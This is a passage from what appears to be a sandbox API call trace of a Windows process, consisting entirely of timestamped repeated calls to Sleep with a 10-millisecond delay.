(dwMilliseconds=0xa) [0133.076] Sleep (dwMilliseconds=0xa) [0133.086] Sleep (dwMilliseconds=0xa) [0133.097] Sleep (dwMilliseconds=0xa) [0133.112] Sleep (dwMilliseconds=0xa) [0133.122] Sleep (dwMilliseconds=0xa) [0133.133] Sleep (dwMilliseconds=0xa) [0133.143] Sleep (dwMilliseconds=0xa) [0133.154] Sleep (dwMilliseconds=0xa) [0133.173] Sleep (dwMilliseconds=0xa) [0133.184] Sleep (dwMilliseconds=0xa) [0133.194] Sleep (dwMilliseconds=0xa) [0133.399] Sleep (dwMilliseconds=0xa) [0133.481] Sleep (dwMilliseconds=0xa) [0133.523] Sleep (dwMilliseconds=0xa) [0133.535] Sleep (dwMilliseconds=0xa) [0133.568] Sleep (dwMilliseconds=0xa) [0133.579] Sleep (dwMilliseconds=0xa) [0133.589] Sleep (dwMilliseconds=0xa) [0133.600] Sleep (dwMilliseconds=0xa) [0133.610] Sleep (dwMilliseconds=0xa) [0133.622] Sleep (dwMilliseconds=0xa) [0133.704] Sleep (dwMilliseconds=0xa) [0133.714] Sleep (dwMilliseconds=0xa) [0133.735] Sleep (dwMilliseconds=0xa) [0133.782] Sleep (dwMilliseconds=0xa) [0133.796] Sleep (dwMilliseconds=0xa) [0133.807] Sleep (dwMilliseconds=0xa) [0133.817] Sleep (dwMilliseconds=0xa) [0133.931] Sleep (dwMilliseconds=0xa) [0134.008] Sleep (dwMilliseconds=0xa) [0134.019] Sleep (dwMilliseconds=0xa) [0134.030] Sleep (dwMilliseconds=0xa) [0134.088] Sleep (dwMilliseconds=0xa) [0134.102] Sleep (dwMilliseconds=0xa) [0134.112] Sleep (dwMilliseconds=0xa) [0134.123] Sleep (dwMilliseconds=0xa) [0134.133] Sleep (dwMilliseconds=0xa) [0134.163] Sleep (dwMilliseconds=0xa) [0134.173] Sleep (dwMilliseconds=0xa) [0134.184] Sleep (dwMilliseconds=0xa) [0134.267] Sleep (dwMilliseconds=0xa) [0134.277] Sleep (dwMilliseconds=0xa) [0134.288] Sleep (dwMilliseconds=0xa) [0134.298] Sleep (dwMilliseconds=0xa) [0134.309] Sleep (dwMilliseconds=0xa) [0134.320] Sleep (dwMilliseconds=0xa) [0134.330] Sleep (dwMilliseconds=0xa) [0134.341] Sleep (dwMilliseconds=0xa) [0134.351] Sleep (dwMilliseconds=0xa) [0134.362] Sleep (dwMilliseconds=0xa) [0134.372] Sleep (dwMilliseconds=0xa) [0134.383] Sleep (dwMilliseconds=0xa) [0134.393] Sleep (dwMilliseconds=0xa) [0134.484] Sleep (dwMilliseconds=0xa) [0134.495] Sleep (dwMilliseconds=0xa) [0134.505] Sleep (dwMilliseconds=0xa) [0134.517] Sleep (dwMilliseconds=0xa) [0134.527] Sleep (dwMilliseconds=0xa) [0134.538] Sleep (dwMilliseconds=0xa) [0134.548] Sleep (dwMilliseconds=0xa) [0134.559] Sleep (dwMilliseconds=0xa) [0134.570] Sleep (dwMilliseconds=0xa) [0134.580] Sleep (dwMilliseconds=0xa) [0134.591] Sleep (dwMilliseconds=0xa) [0134.601] Sleep (dwMilliseconds=0xa) [0134.652] Sleep (dwMilliseconds=0xa) [0134.777] Sleep (dwMilliseconds=0xa) [0134.787] Sleep (dwMilliseconds=0xa) [0134.798] Sleep (dwMilliseconds=0xa) [0134.808] Sleep (dwMilliseconds=0xa) [0134.819] Sleep (dwMilliseconds=0xa) [0134.829] Sleep (dwMilliseconds=0xa) [0134.840] Sleep (dwMilliseconds=0xa) [0134.851] Sleep (dwMilliseconds=0xa) [0134.863] Sleep (dwMilliseconds=0xa) [0134.873] Sleep (dwMilliseconds=0xa) [0134.884] Sleep (dwMilliseconds=0xa) [0134.967] Sleep (dwMilliseconds=0xa) [0135.055] Sleep (dwMilliseconds=0xa) [0135.167] Sleep (dwMilliseconds=0xa) [0135.178] Sleep (dwMilliseconds=0xa) [0135.188] Sleep (dwMilliseconds=0xa) [0135.199] Sleep (dwMilliseconds=0xa) [0135.304] Sleep (dwMilliseconds=0xa) [0135.314] Sleep (dwMilliseconds=0xa) [0135.325] Sleep (dwMilliseconds=0xa) [0135.336] Sleep (dwMilliseconds=0xa) [0135.346] Sleep (dwMilliseconds=0xa) [0135.357] Sleep (dwMilliseconds=0xa) [0135.368] Sleep (dwMilliseconds=0xa) [0135.380] Sleep (dwMilliseconds=0xa) [0135.390] Sleep (dwMilliseconds=0xa) [0135.488] Sleep (dwMilliseconds=0xa) [0135.515] Sleep (dwMilliseconds=0xa) [0135.526] Sleep (dwMilliseconds=0xa) [0135.616] Sleep (dwMilliseconds=0xa) [0135.633] Sleep (dwMilliseconds=0xa) [0135.643] Sleep (dwMilliseconds=0xa) [0135.668] Sleep (dwMilliseconds=0xa) [0135.684] Sleep (dwMilliseconds=0xa) [0135.695] Sleep (dwMilliseconds=0xa) [0135.706] Sleep (dwMilliseconds=0xa) [0135.734] Sleep (dwMilliseconds=0xa) [0135.763] Sleep (dwMilliseconds=0xa) [0135.784] Sleep (dwMilliseconds=0xa) [0135.865] Sleep (dwMilliseconds=0xa) [0135.877] Sleep (dwMilliseconds=0xa) [0135.890] Sleep (dwMilliseconds=0xa) [0135.902] Sleep (dwMilliseconds=0xa) [0135.912] Sleep (dwMilliseconds=0xa) [0135.922] Sleep (dwMilliseconds=0xa) [0135.933] Sleep (dwMilliseconds=0xa) [0135.945] Sleep (dwMilliseconds=0xa) [0135.956] Sleep (dwMilliseconds=0xa) [0136.089] Sleep (dwMilliseconds=0xa) [0136.159] Sleep (dwMilliseconds=0xa) [0136.224] Sleep (dwMilliseconds=0xa) [0136.234] Sleep (dwMilliseconds=0xa) [0136.244] Sleep (dwMilliseconds=0xa) [0136.255] Sleep (dwMilliseconds=0xa) [0136.304] Sleep (dwMilliseconds=0xa) [0136.314] Sleep (dwMilliseconds=0xa) [0136.522] Sleep (dwMilliseconds=0xa) [0136.534] Sleep (dwMilliseconds=0xa) [0136.545] Sleep (dwMilliseconds=0xa) [0136.595] Sleep (dwMilliseconds=0xa) [0136.606] Sleep (dwMilliseconds=0xa) [0136.617] Sleep (dwMilliseconds=0xa) [0136.628] Sleep (dwMilliseconds=0xa) [0136.639] Sleep (dwMilliseconds=0xa) [0136.650] Sleep (dwMilliseconds=0xa) [0136.661] Sleep (dwMilliseconds=0xa) [0136.672] Sleep (dwMilliseconds=0xa) [0136.685] Sleep (dwMilliseconds=0xa) [0136.697] Sleep (dwMilliseconds=0xa) [0136.858] Sleep (dwMilliseconds=0xa) [0136.871] Sleep (dwMilliseconds=0xa) [0136.883] Sleep (dwMilliseconds=0xa) [0136.944] Sleep (dwMilliseconds=0xa) [0136.959] Sleep (dwMilliseconds=0xa) [0136.981] Sleep (dwMilliseconds=0xa) [0136.991] Sleep (dwMilliseconds=0xa) [0137.003] Sleep (dwMilliseconds=0xa) [0137.013] Sleep (dwMilliseconds=0xa) [0137.024] Sleep (dwMilliseconds=0xa) [0137.034] Sleep (dwMilliseconds=0xa) [0137.100] Sleep (dwMilliseconds=0xa) [0137.110] Sleep (dwMilliseconds=0xa) [0137.122] Sleep (dwMilliseconds=0xa) [0137.172] Sleep (dwMilliseconds=0xa) [0137.185] Sleep (dwMilliseconds=0xa) [0137.196] Sleep (dwMilliseconds=0xa) [0137.206] Sleep (dwMilliseconds=0xa) [0137.330] Sleep (dwMilliseconds=0xa) [0137.382] Sleep (dwMilliseconds=0xa) [0137.419] Sleep (dwMilliseconds=0xa) [0137.485] Sleep (dwMilliseconds=0xa) [0137.525] Sleep (dwMilliseconds=0xa) [0137.537] Sleep (dwMilliseconds=0xa) [0137.548] Sleep (dwMilliseconds=0xa) [0137.594] Sleep (dwMilliseconds=0xa) [0137.689] Sleep (dwMilliseconds=0xa) [0137.701] Sleep (dwMilliseconds=0xa) [0137.712] Sleep (dwMilliseconds=0xa) [0137.798] Sleep (dwMilliseconds=0xa) [0137.808] Sleep (dwMilliseconds=0xa) [0137.819] Sleep (dwMilliseconds=0xa) [0137.829] Sleep (dwMilliseconds=0xa) [0137.840] Sleep (dwMilliseconds=0xa) [0137.851] Sleep (dwMilliseconds=0xa) [0137.866] Sleep (dwMilliseconds=0xa) [0137.878] Sleep (dwMilliseconds=0xa) [0137.894] Sleep (dwMilliseconds=0xa) [0137.967] Sleep (dwMilliseconds=0xa) [0137.978] Sleep (dwMilliseconds=0xa) [0137.992] Sleep (dwMilliseconds=0xa) [0138.045] Sleep (dwMilliseconds=0xa) [0138.056] Sleep (dwMilliseconds=0xa) [0138.066] Sleep (dwMilliseconds=0xa) [0138.078] Sleep (dwMilliseconds=0xa) [0138.091] Sleep (dwMilliseconds=0xa) [0138.102] Sleep (dwMilliseconds=0xa) [0138.114] Sleep (dwMilliseconds=0xa) [0138.125] Sleep (dwMilliseconds=0xa) [0138.136] Sleep (dwMilliseconds=0xa) [0138.207] Sleep (dwMilliseconds=0xa) [0138.218] Sleep (dwMilliseconds=0xa) [0138.228] Sleep (dwMilliseconds=0xa) [0138.264] Sleep (dwMilliseconds=0xa) [0138.341] Sleep (dwMilliseconds=0xa) [0138.352] Sleep (dwMilliseconds=0xa) [0138.362] Sleep (dwMilliseconds=0xa) [0138.521] Sleep (dwMilliseconds=0xa) [0138.537] Sleep (dwMilliseconds=0xa) [0138.547] Sleep (dwMilliseconds=0xa) [0138.558] Sleep (dwMilliseconds=0xa) [0138.569] Sleep (dwMilliseconds=0xa) [0138.581] Sleep (dwMilliseconds=0xa) [0138.592] Sleep (dwMilliseconds=0xa) [0138.603] Sleep (dwMilliseconds=0xa) [0138.614] Sleep (dwMilliseconds=0xa) [0138.625] Sleep (dwMilliseconds=0xa) [0138.636] Sleep (dwMilliseconds=0xa) [0138.760] Sleep (dwMilliseconds=0xa) [0138.872] Sleep (dwMilliseconds=0xa) [0138.882] Sleep (dwMilliseconds=0xa) [0138.893] Sleep (dwMilliseconds=0xa) [0138.911] Sleep (dwMilliseconds=0xa) [0138.922] Sleep (dwMilliseconds=0xa) [0138.933] Sleep (dwMilliseconds=0xa) [0138.943] Sleep (dwMilliseconds=0xa) [0138.980] Sleep (dwMilliseconds=0xa) [0139.080] Sleep (dwMilliseconds=0xa) [0139.090] Sleep (dwMilliseconds=0xa) [0139.101] Sleep (dwMilliseconds=0xa) [0139.111] Sleep (dwMilliseconds=0xa) [0139.122] Sleep (dwMilliseconds=0xa) [0139.133] Sleep (dwMilliseconds=0xa) [0139.143] Sleep (dwMilliseconds=0xa) [0139.154] Sleep (dwMilliseconds=0xa) [0139.235] Sleep (dwMilliseconds=0xa) [0139.337] Sleep (dwMilliseconds=0xa) [0139.474] Sleep (dwMilliseconds=0xa) [0139.485] Sleep (dwMilliseconds=0xa) [0139.497] Sleep (dwMilliseconds=0xa) [0139.507] Sleep (dwMilliseconds=0xa) [0139.605] Sleep (dwMilliseconds=0xa) [0139.616] Sleep (dwMilliseconds=0xa) [0139.627] Sleep (dwMilliseconds=0xa) [0139.637] Sleep (dwMilliseconds=0xa) [0139.652] Sleep (dwMilliseconds=0xa) [0139.663] Sleep (dwMilliseconds=0xa) [0139.673] Sleep (dwMilliseconds=0xa) [0139.687] Sleep (dwMilliseconds=0xa) [0139.826] Sleep (dwMilliseconds=0xa) [0139.952] Sleep (dwMilliseconds=0xa) [0140.036] Sleep (dwMilliseconds=0xa) [0140.047] Sleep (dwMilliseconds=0xa) [0140.057] Sleep (dwMilliseconds=0xa) [0140.081] Sleep (dwMilliseconds=0xa) [0140.091] Sleep (dwMilliseconds=0xa) [0140.104] Sleep (dwMilliseconds=0xa) [0140.122] Sleep (dwMilliseconds=0xa) [0140.133] Sleep (dwMilliseconds=0xa) [0140.144] Sleep (dwMilliseconds=0xa) [0140.248] Sleep (dwMilliseconds=0xa) [0140.258] Sleep (dwMilliseconds=0xa) [0140.270] Sleep (dwMilliseconds=0xa) [0140.281] Sleep (dwMilliseconds=0xa) [0140.292] Sleep (dwMilliseconds=0xa) [0140.303] Sleep (dwMilliseconds=0xa) [0140.314] Sleep (dwMilliseconds=0xa) [0140.326] Sleep (dwMilliseconds=0xa) [0140.336] Sleep (dwMilliseconds=0xa) [0140.347] Sleep (dwMilliseconds=0xa) [0140.422] Sleep (dwMilliseconds=0xa) [0140.534] Sleep (dwMilliseconds=0xa) [0140.653] Sleep (dwMilliseconds=0xa) [0140.664] Sleep (dwMilliseconds=0xa) [0140.675] Sleep (dwMilliseconds=0xa) [0140.700] Sleep (dwMilliseconds=0xa) [0140.711] Sleep (dwMilliseconds=0xa) [0140.740] Sleep (dwMilliseconds=0xa) [0140.750] Sleep (dwMilliseconds=0xa) [0140.859] Sleep (dwMilliseconds=0xa) [0140.870] Sleep (dwMilliseconds=0xa) [0140.880] Sleep (dwMilliseconds=0xa) [0140.891] Sleep (dwMilliseconds=0xa) [0140.901] Sleep (dwMilliseconds=0xa) [0140.913] Sleep (dwMilliseconds=0xa) [0141.000] Sleep (dwMilliseconds=0xa) [0141.017] Sleep (dwMilliseconds=0xa) [0141.027] Sleep (dwMilliseconds=0xa) [0141.101] Sleep (dwMilliseconds=0xa) [0141.208] Sleep (dwMilliseconds=0xa) [0141.219] Sleep (dwMilliseconds=0xa) [0141.231] Sleep (dwMilliseconds=0xa) [0141.241] Sleep (dwMilliseconds=0xa) [0141.265] Sleep (dwMilliseconds=0xa) [0141.275] Sleep (dwMilliseconds=0xa) [0141.285] Sleep (dwMilliseconds=0xa) [0141.296] Sleep (dwMilliseconds=0xa) [0141.354] Sleep (dwMilliseconds=0xa) [0141.391] Sleep (dwMilliseconds=0xa) [0141.402] Sleep (dwMilliseconds=0xa) [0141.412] Sleep (dwMilliseconds=0xa) [0141.465] Sleep (dwMilliseconds=0xa) [0141.475] Sleep (dwMilliseconds=0xa) [0141.485] Sleep (dwMilliseconds=0xa) [0141.496] Sleep (dwMilliseconds=0xa) [0141.507] Sleep (dwMilliseconds=0xa) [0141.518] Sleep (dwMilliseconds=0xa) [0141.606] Sleep (dwMilliseconds=0xa) [0141.655] Sleep (dwMilliseconds=0xa) [0141.748] Sleep (dwMilliseconds=0xa) [0141.812] Sleep (dwMilliseconds=0xa) [0141.834] Sleep (dwMilliseconds=0xa) [0141.845] Sleep (dwMilliseconds=0xa) [0141.872] Sleep (dwMilliseconds=0xa) [0141.883] Sleep (dwMilliseconds=0xa) [0141.893] Sleep (dwMilliseconds=0xa) [0141.903] Sleep (dwMilliseconds=0xa) [0141.960] Sleep (dwMilliseconds=0xa) [0141.971] Sleep (dwMilliseconds=0xa) [0141.981] Sleep (dwMilliseconds=0xa) [0142.058] Sleep (dwMilliseconds=0xa) [0142.074] Sleep (dwMilliseconds=0xa) [0142.084] Sleep (dwMilliseconds=0xa) [0142.095] Sleep (dwMilliseconds=0xa) [0142.181] Sleep (dwMilliseconds=0xa) [0142.226] Sleep (dwMilliseconds=0xa) [0142.322] Sleep (dwMilliseconds=0xa) [0142.457] Sleep (dwMilliseconds=0xa) [0142.489] Sleep (dwMilliseconds=0xa) [0142.500] Sleep (dwMilliseconds=0xa) [0142.511] Sleep (dwMilliseconds=0xa) [0142.522] Sleep (dwMilliseconds=0xa) [0142.533] Sleep (dwMilliseconds=0xa) [0142.543] Sleep (dwMilliseconds=0xa) [0142.555] Sleep (dwMilliseconds=0xa) [0142.609] Sleep (dwMilliseconds=0xa) [0142.701] Sleep (dwMilliseconds=0xa) [0142.765] Sleep (dwMilliseconds=0xa) [0142.794] Sleep (dwMilliseconds=0xa) [0142.828] Sleep (dwMilliseconds=0xa) [0142.844] Sleep (dwMilliseconds=0xa) [0142.854] Sleep (dwMilliseconds=0xa) [0142.867] Sleep (dwMilliseconds=0xa) [0142.932] Sleep (dwMilliseconds=0xa) [0142.943] Sleep (dwMilliseconds=0xa) [0142.954] Sleep (dwMilliseconds=0xa) [0142.964] Sleep (dwMilliseconds=0xa) [0142.975] Sleep (dwMilliseconds=0xa) [0142.986] Sleep (dwMilliseconds=0xa) [0142.997] Sleep (dwMilliseconds=0xa) [0143.087] Sleep (dwMilliseconds=0xa) [0143.182] Sleep (dwMilliseconds=0xa) [0143.239] Sleep (dwMilliseconds=0xa) [0143.249] Sleep (dwMilliseconds=0xa) [0143.259] Sleep (dwMilliseconds=0xa) [0143.270] Sleep (dwMilliseconds=0xa) [0143.282] Sleep (dwMilliseconds=0xa) [0143.301] Sleep (dwMilliseconds=0xa) [0143.395] Sleep (dwMilliseconds=0xa) [0143.406] Sleep (dwMilliseconds=0xa) [0143.416] Sleep (dwMilliseconds=0xa) [0143.467] Sleep (dwMilliseconds=0xa) [0143.477] Sleep (dwMilliseconds=0xa) [0143.514] Sleep (dwMilliseconds=0xa) [0143.628] Sleep (dwMilliseconds=0xa) [0143.704] Sleep (dwMilliseconds=0xa) [0143.759] Sleep (dwMilliseconds=0xa) [0143.769] Sleep (dwMilliseconds=0xa) [0143.791] Sleep (dwMilliseconds=0xa) [0143.802] Sleep (dwMilliseconds=0xa) [0143.845] Sleep (dwMilliseconds=0xa) [0143.856] Sleep (dwMilliseconds=0xa) [0143.867] Sleep (dwMilliseconds=0xa) [0143.909] Sleep (dwMilliseconds=0xa) [0143.920] Sleep (dwMilliseconds=0xa) [0143.931] Sleep (dwMilliseconds=0xa) [0144.022] Sleep (dwMilliseconds=0xa) [0144.076] Sleep (dwMilliseconds=0xa) [0144.107] Sleep (dwMilliseconds=0xa) [0144.138] Sleep (dwMilliseconds=0xa) [0144.149] Sleep (dwMilliseconds=0xa) [0144.159] Sleep (dwMilliseconds=0xa) [0144.169] Sleep (dwMilliseconds=0xa) [0144.192] Sleep (dwMilliseconds=0xa) [0144.203] Sleep (dwMilliseconds=0xa) [0144.213] Sleep (dwMilliseconds=0xa) [0144.224] Sleep (dwMilliseconds=0xa) [0144.271] Sleep (dwMilliseconds=0xa) [0144.345] Sleep (dwMilliseconds=0xa) [0144.356] Sleep (dwMilliseconds=0xa) [0144.426] Sleep (dwMilliseconds=0xa) [0144.437] Sleep (dwMilliseconds=0xa) [0144.448] Sleep (dwMilliseconds=0xa) [0144.459] Sleep (dwMilliseconds=0xa) [0144.557] Sleep (dwMilliseconds=0xa) [0144.568] Sleep (dwMilliseconds=0xa) [0144.579] Sleep (dwMilliseconds=0xa) [0144.589] Sleep (dwMilliseconds=0xa) [0144.664] Sleep (dwMilliseconds=0xa) [0144.688] Sleep (dwMilliseconds=0xa) [0144.871] Sleep (dwMilliseconds=0xa) [0144.971] Sleep (dwMilliseconds=0xa) [0144.982] Sleep (dwMilliseconds=0xa) [0144.993] Sleep (dwMilliseconds=0xa) [0145.004] Sleep (dwMilliseconds=0xa) [0145.015] Sleep (dwMilliseconds=0xa) [0145.025] Sleep (dwMilliseconds=0xa) [0145.134] Sleep (dwMilliseconds=0xa) [0145.150] Sleep (dwMilliseconds=0xa) [0145.161] Sleep (dwMilliseconds=0xa) [0145.171] Sleep (dwMilliseconds=0xa) [0145.257] Sleep (dwMilliseconds=0xa) [0145.284] Sleep (dwMilliseconds=0xa) [0145.295] Sleep (dwMilliseconds=0xa) [0145.316] Sleep (dwMilliseconds=0xa) [0145.326] Sleep (dwMilliseconds=0xa) [0145.339] Sleep (dwMilliseconds=0xa) [0145.350] Sleep (dwMilliseconds=0xa) [0145.390] Sleep (dwMilliseconds=0xa) [0145.401] Sleep (dwMilliseconds=0xa) [0145.411] Sleep (dwMilliseconds=0xa) [0145.489] Sleep (dwMilliseconds=0xa) [0145.501] Sleep (dwMilliseconds=0xa) [0145.511] Sleep (dwMilliseconds=0xa) [0145.522] Sleep (dwMilliseconds=0xa) [0145.533] Sleep (dwMilliseconds=0xa) [0145.543] Sleep (dwMilliseconds=0xa) [0145.619] Sleep (dwMilliseconds=0xa) [0145.654] Sleep (dwMilliseconds=0xa) [0145.804] Sleep (dwMilliseconds=0xa) [0145.865] Sleep (dwMilliseconds=0xa) [0145.876] Sleep (dwMilliseconds=0xa) [0145.888] Sleep (dwMilliseconds=0xa) [0145.898] Sleep (dwMilliseconds=0xa) [0145.915] Sleep (dwMilliseconds=0xa) [0145.955] Sleep (dwMilliseconds=0xa) [0146.070] Sleep (dwMilliseconds=0xa) [0146.141] Sleep (dwMilliseconds=0xa) [0146.194] Sleep (dwMilliseconds=0xa) [0146.230] Sleep (dwMilliseconds=0xa) [0146.240] Sleep (dwMilliseconds=0xa) [0146.265] Sleep (dwMilliseconds=0xa) [0146.276] Sleep (dwMilliseconds=0xa) [0146.286] Sleep (dwMilliseconds=0xa) [0146.350] Sleep (dwMilliseconds=0xa) [0146.361] Sleep (dwMilliseconds=0xa) [0146.443] Sleep (dwMilliseconds=0xa) [0146.493] Sleep (dwMilliseconds=0xa) [0146.589] Sleep (dwMilliseconds=0xa) [0146.652] Sleep (dwMilliseconds=0xa) [0146.689] Sleep (dwMilliseconds=0xa) [0146.736] Sleep (dwMilliseconds=0xa) [0146.747] Sleep (dwMilliseconds=0xa) [0146.758] Sleep (dwMilliseconds=0xa) [0146.769] Sleep (dwMilliseconds=0xa) [0146.780] Sleep (dwMilliseconds=0xa) [0146.791] Sleep (dwMilliseconds=0xa) [0146.801] Sleep (dwMilliseconds=0xa) [0146.909] Sleep (dwMilliseconds=0xa) [0146.985] Sleep (dwMilliseconds=0xa) [0147.002] Sleep (dwMilliseconds=0xa) [0147.012] Sleep (dwMilliseconds=0xa) [0147.030] Sleep (dwMilliseconds=0xa) [0147.041] Sleep (dwMilliseconds=0xa) [0147.051] Sleep (dwMilliseconds=0xa) [0147.076] Sleep (dwMilliseconds=0xa) [0147.087] Sleep (dwMilliseconds=0xa) [0147.098] Sleep (dwMilliseconds=0xa) [0147.143] Sleep (dwMilliseconds=0xa) [0147.235] Sleep (dwMilliseconds=0xa) [0147.245] Sleep (dwMilliseconds=0xa) [0147.256] Sleep (dwMilliseconds=0xa) [0147.266] Sleep (dwMilliseconds=0xa) [0147.277] Sleep (dwMilliseconds=0xa) [0147.288] Sleep (dwMilliseconds=0xa) [0147.379] Sleep (dwMilliseconds=0xa) [0147.466] Sleep (dwMilliseconds=0xa) [0147.567] Sleep (dwMilliseconds=0xa) [0147.588] Sleep (dwMilliseconds=0xa) [0147.613] Sleep (dwMilliseconds=0xa) [0147.705] Sleep (dwMilliseconds=0xa) [0147.752] Sleep (dwMilliseconds=0xa) [0147.763] Sleep (dwMilliseconds=0xa) [0147.776] Sleep (dwMilliseconds=0xa) [0147.786] Sleep (dwMilliseconds=0xa) [0147.796] Sleep (dwMilliseconds=0xa) [0147.830] Sleep (dwMilliseconds=0xa) [0147.841] Sleep (dwMilliseconds=0xa) [0147.852] Sleep (dwMilliseconds=0xa) [0147.931] Sleep (dwMilliseconds=0xa) [0147.942] Sleep (dwMilliseconds=0xa) [0147.952] Sleep (dwMilliseconds=0xa) [0148.026] Sleep (dwMilliseconds=0xa) [0148.066] Sleep (dwMilliseconds=0xa) [0148.128] Sleep (dwMilliseconds=0xa) [0148.188] Sleep (dwMilliseconds=0xa) [0148.249] Sleep (dwMilliseconds=0xa) [0148.260] Sleep (dwMilliseconds=0xa) [0148.284] Sleep (dwMilliseconds=0xa) [0148.425] Sleep (dwMilliseconds=0xa) [0148.435] Sleep (dwMilliseconds=0xa) [0148.446] Sleep (dwMilliseconds=0xa) [0148.474] Sleep (dwMilliseconds=0xa) [0148.485] Sleep (dwMilliseconds=0xa) [0148.496] Sleep (dwMilliseconds=0xa) [0148.507] Sleep (dwMilliseconds=0xa) [0148.519] Sleep (dwMilliseconds=0xa) [0148.592] Sleep (dwMilliseconds=0xa) [0148.662] Sleep (dwMilliseconds=0xa) [0148.800] Sleep (dwMilliseconds=0xa) [0148.839] Sleep (dwMilliseconds=0xa) [0148.875] Sleep (dwMilliseconds=0xa) [0148.891] Sleep (dwMilliseconds=0xa) [0148.901] Sleep (dwMilliseconds=0xa) [0148.912] Sleep (dwMilliseconds=0xa) [0148.960] Sleep (dwMilliseconds=0xa) [0149.030] Sleep (dwMilliseconds=0xa) [0149.079] Sleep (dwMilliseconds=0xa) [0149.117] Sleep (dwMilliseconds=0xa) [0149.153] Sleep (dwMilliseconds=0xa) [0149.164] Sleep (dwMilliseconds=0xa) [0149.175] Sleep (dwMilliseconds=0xa) [0149.186] Sleep (dwMilliseconds=0xa) [0149.196] Sleep (dwMilliseconds=0xa) [0149.207] Sleep (dwMilliseconds=0xa) [0149.288] Sleep (dwMilliseconds=0xa) [0149.299] Sleep (dwMilliseconds=0xa) [0149.310] Sleep (dwMilliseconds=0xa) [0149.336] Sleep (dwMilliseconds=0xa) [0149.416] Sleep (dwMilliseconds=0xa) [0149.426] Sleep (dwMilliseconds=0xa) [0149.546] Sleep (dwMilliseconds=0xa) [0149.597] Sleep (dwMilliseconds=0xa) [0149.631] Sleep (dwMilliseconds=0xa) [0149.666] Sleep (dwMilliseconds=0xa) [0149.687] Sleep (dwMilliseconds=0xa) [0149.808] Sleep (dwMilliseconds=0xa) [0149.882] Sleep (dwMilliseconds=0xa) [0149.912] Sleep (dwMilliseconds=0xa) [0149.945] Sleep (dwMilliseconds=0xa) [0149.979] Sleep (dwMilliseconds=0xa) [0149.989] Sleep (dwMilliseconds=0xa) [0150.000] Sleep (dwMilliseconds=0xa) [0150.010] Sleep (dwMilliseconds=0xa) [0150.021] Sleep (dwMilliseconds=0xa) [0150.031] Sleep (dwMilliseconds=0xa) [0150.043] Sleep (dwMilliseconds=0xa) [0150.122] Sleep (dwMilliseconds=0xa) [0150.133] Sleep (dwMilliseconds=0xa) [0150.144] Sleep (dwMilliseconds=0xa) [0150.154] Sleep (dwMilliseconds=0xa) [0150.165] Sleep (dwMilliseconds=0xa) [0150.176] Sleep (dwMilliseconds=0xa) [0150.266] Sleep (dwMilliseconds=0xa) [0150.365] Sleep (dwMilliseconds=0xa) [0150.423] Sleep (dwMilliseconds=0xa) [0150.434] Sleep (dwMilliseconds=0xa) [0150.444] Sleep (dwMilliseconds=0xa) [0150.458] Sleep (dwMilliseconds=0xa) [0150.475] Sleep (dwMilliseconds=0xa) [0150.485] Sleep (dwMilliseconds=0xa) [0150.514] Sleep (dwMilliseconds=0xa) [0150.612] Sleep (dwMilliseconds=0xa) [0150.622] Sleep (dwMilliseconds=0xa) [0150.633] Sleep (dwMilliseconds=0xa) [0150.644] Sleep (dwMilliseconds=0xa) [0150.659] Sleep (dwMilliseconds=0xa) [0150.798] Sleep (dwMilliseconds=0xa) [0150.814] Sleep (dwMilliseconds=0xa) [0150.826] Sleep (dwMilliseconds=0xa) [0150.932] Sleep (dwMilliseconds=0xa) [0151.015] Sleep (dwMilliseconds=0xa) [0151.057] Sleep (dwMilliseconds=0xa) [0151.068] Sleep (dwMilliseconds=0xa) [0151.078] Sleep (dwMilliseconds=0xa) [0151.089] Sleep (dwMilliseconds=0xa) [0151.099] Sleep (dwMilliseconds=0xa) [0151.112] Sleep (dwMilliseconds=0xa) [0151.184] Sleep (dwMilliseconds=0xa) [0151.194] Sleep (dwMilliseconds=0xa) [0151.205] Sleep (dwMilliseconds=0xa) [0151.267] Sleep (dwMilliseconds=0xa) [0151.317] Sleep (dwMilliseconds=0xa) [0151.328] Sleep (dwMilliseconds=0xa) [0151.344] Sleep (dwMilliseconds=0xa) [0151.354] Sleep (dwMilliseconds=0xa) [0151.365] Sleep (dwMilliseconds=0xa) [0151.399] Sleep (dwMilliseconds=0xa) [0151.410] Sleep (dwMilliseconds=0xa) [0151.421] Sleep (dwMilliseconds=0xa) [0151.479] Sleep (dwMilliseconds=0xa) [0151.492] Sleep (dwMilliseconds=0xa) [0151.507] Sleep (dwMilliseconds=0xa) [0151.595] Sleep (dwMilliseconds=0xa) [0151.629] Sleep (dwMilliseconds=0xa) [0151.697] Sleep (dwMilliseconds=0xa) [0151.786] Sleep (dwMilliseconds=0xa) [0151.796] Sleep (dwMilliseconds=0xa) [0151.807] Sleep (dwMilliseconds=0xa) [0151.817] Sleep (dwMilliseconds=0xa) [0151.854] Sleep (dwMilliseconds=0xa) [0151.892] Sleep (dwMilliseconds=0xa) [0151.927] Sleep (dwMilliseconds=0xa) [0151.938] Sleep (dwMilliseconds=0xa) [0151.948] Sleep (dwMilliseconds=0xa) [0152.001] Sleep (dwMilliseconds=0xa) [0152.011] Sleep (dwMilliseconds=0xa) [0152.022] Sleep (dwMilliseconds=0xa) [0152.042] Sleep (dwMilliseconds=0xa) [0152.053] Sleep (dwMilliseconds=0xa) [0152.063] Sleep (dwMilliseconds=0xa) [0152.074] Sleep (dwMilliseconds=0xa) [0152.105] Sleep (dwMilliseconds=0xa) [0152.163] Sleep (dwMilliseconds=0xa) [0152.173] Sleep (dwMilliseconds=0xa) [0152.184] Sleep (dwMilliseconds=0xa) [0152.234] Sleep (dwMilliseconds=0xa) [0152.245] Sleep (dwMilliseconds=0xa) [0152.332] Sleep (dwMilliseconds=0xa) [0152.375] Sleep (dwMilliseconds=0xa) [0152.470] Sleep (dwMilliseconds=0xa) [0152.524] Sleep (dwMilliseconds=0xa) [0152.562] Sleep (dwMilliseconds=0xa) [0152.573] Sleep (dwMilliseconds=0xa) [0152.584] Sleep (dwMilliseconds=0xa) [0152.595] Sleep (dwMilliseconds=0xa) [0152.605] Sleep (dwMilliseconds=0xa) [0152.616] Sleep (dwMilliseconds=0xa) [0152.687] Sleep (dwMilliseconds=0xa) [0152.703] Sleep (dwMilliseconds=0xa) [0152.713] Sleep (dwMilliseconds=0xa) [0152.764] Sleep (dwMilliseconds=0xa) [0152.775] Sleep (dwMilliseconds=0xa) [0152.863] Sleep (dwMilliseconds=0xa) [0152.932] Sleep (dwMilliseconds=0xa) [0153.000] Sleep (dwMilliseconds=0xa) [0153.053] Sleep (dwMilliseconds=0xa) [0153.098] Sleep (dwMilliseconds=0xa) [0153.108] Sleep (dwMilliseconds=0xa) [0153.119] 